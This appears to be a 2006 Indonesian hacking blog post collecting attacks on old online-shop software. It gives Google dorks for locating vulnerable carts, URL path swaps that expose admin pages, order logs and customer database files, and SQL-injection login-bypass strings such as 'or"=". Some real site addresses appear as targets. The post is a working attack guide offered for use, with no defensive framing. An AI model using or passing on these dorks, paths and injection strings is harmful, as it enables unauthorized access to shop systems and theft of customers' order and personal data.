Kumpulan Shopadmin Exploits
google dork : allinurl:store/index.cgi/page=
Bugs : ../admin/files/order.log
Example : http://www.target.com/cgi-bin/store/...ir_Manuals.htm
masukin bugsnya : http://www.target.com/cgi-bin/store/...iles/order.log
keyword : inurl:"/cart.php?m="
Bugs : Admin
ganti tulisn cart.php?m=view dengan admin
login pake SQl Injection :
username :'or"="
Passwordnya : 'or"="
Keyword : /ashopKart20/"
bugs : ganti tulisan yang ada didepannya ama admin/scart.mdb
example : www.garrysun.com/ashopkart20/addprod.asp
Injection : www.garrysun.com/ashopkart20/admin/scart.mdb
keyword : /shop/category.asp/catid=
Bugs : hapus tulisan /shop/category.asp?catid=2 ganti dengan /admin/dbsetup.asp
example : www.littlesport.net/shop/category.asp?catid=2
masukin bugs menjadi : www.littlesport.net//admin/dbsetup.asp
trus bug tadi diganti dengan /data/pdshoppro.mdb
keyword : inurl:"/store/proddetail.asp?prod="
bugs : ganti tulisan proddetail.asp?prod= dengan fpdb/vsproducts.mdb
google dork : "Powered by SunShop 3.2"
Atau google dork : inurl:"/sunshop/index.php?action="
Bugs : ganti kata index.php dgn admin
Contoh: http://www.domain.com/sunshop/index.php
ganti dengan admin http://www.domain.com/sunshop/admin
Login pake SQL Injection :
Username : admin
Password :'or''='
Google dork : "Powered by Digishop 3.2"
Bugs : hapus tulisan cart.php?m= dengan admin
Username : 'or"="
Password : 'or"="
google dork : inurl:"mall/lobby.asp"
bugs : ganti tulisan /mall/lobby.asp dengan fpdb/shop.mdb
example : Gem Depot Lobby Page - Search our Inventory
http://www.gemdepot.com/fpdb/shop.mdb
keyword allinurl:/DCShop/
bug: /DCShop/orders/orders.txt atau
/DCShop/Orders/orders.txt
keyword allinurl:/eshop/
bug: /cg-bin/eshop/database/order.mdb
contoh: http://www.contoh.com/.../cg-bin/eshop/database/order.mdb
Friday, July 14, 2006
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment